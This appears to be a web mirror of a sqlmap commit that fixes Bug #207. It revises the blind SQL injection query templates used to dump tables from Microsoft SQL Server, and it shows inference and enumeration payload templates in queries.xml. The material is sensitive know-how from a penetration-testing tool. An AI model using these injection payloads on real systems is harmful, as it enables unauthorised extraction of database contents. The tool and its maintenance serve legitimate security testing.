sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-18 04:20:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

fix for Bug #207

Browse Source
This commit is contained in:
Miroslav Stampar 2010-10-22 14:01:48 +00:00
parent 1b2ec826bf
commit dec4d858b3
3 changed files with 8 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/request/inject.py
View File

@ -124,7 +124,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I)
if rdbRegExp and kb.dbms == "Firebird": if rdbRegExp and kb.dbms == "Firebird":
expressionFieldsList = [expressionFields] expressionFieldsList = [expressionFields]
if len(expressionFieldsList) > 1: if len(expressionFieldsList) > 1:
infoMsg = "the SQL query provided has more than a field. " infoMsg = "the SQL query provided has more than a field. "
infoMsg += "sqlmap will now unpack it into distinct queries " infoMsg += "sqlmap will now unpack it into distinct queries "

8
plugins/generic/enumeration.py
View File

@ -1169,10 +1169,10 @@ class Enumeration:
conf.tbl.upper(), conf.tbl.upper(),
index) index)
elif kb.dbms == "Microsoft SQL Server": elif kb.dbms == "Microsoft SQL Server":
query = rootQuery.blind.query % (column, conf.db, query = rootQuery.blind.query % (column, index + 1, conf.db,
conf.tbl, column, conf.tbl, colList[0],
index, column, colList[0], colList[0])
conf.db, conf.tbl)
elif kb.dbms == "SQLite": elif kb.dbms == "SQLite":
query = rootQuery.blind.query % (column, conf.tbl, index) query = rootQuery.blind.query % (column, conf.tbl, index)

5
xml/queries.xml
View File

@ -273,7 +273,8 @@
</columns> </columns>
<dump_table> <dump_table>
<inband query="SELECT %s FROM %s..%s"/> <inband query="SELECT %s FROM %s..%s"/>
<blind query="SELECT TOP 1 %s FROM %s..%s WHERE %s NOT IN (SELECT TOP %d %s FROM %s..%s)" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/> <!--<blind query="SELECT TOP 1 %s FROM %s..%s WHERE %s NOT IN (SELECT TOP %d %s FROM %s..%s)" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/>-->
<blind query="SELECT TOP 1 %s FROM (SELECT TOP 1 * FROM ( SELECT TOP %d * FROM %s..%s ORDER BY %s ASC ) AS t1 ORDER BY %s DESC) AS t2 ORDER BY %s ASC" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/>
</dump_table> </dump_table>
<search_db> <search_db>
<inband query="SELECT name FROM master..sysdatabases WHERE " condition="name"/> <inband query="SELECT name FROM master..sysdatabases WHERE " condition="name"/>
@ -358,7 +359,7 @@
<current_db/> <current_db/>
<inference query="AND ASC(MID((%s), %d, 1)) > %d"/> <inference query="AND ASC(MID((%s), %d, 1)) > %d"/>
<is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/> <is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/>
<dbs/> <dbs/>
<tables> <tables>
<inband query="SELECT Name FROM MSysObjects WHERE (Left([Name],1) &lt;&gt; '~') AND (Left([Name],4) &lt;&gt; 'MSys') AND ([Type] In (1, 4, 6))"/> <inband query="SELECT Name FROM MSysObjects WHERE (Left([Name],1) &lt;&gt; '~') AND (Left([Name],4) &lt;&gt; 'MSys') AND ([Type] In (1, 4, 6))"/>
</tables> </tables>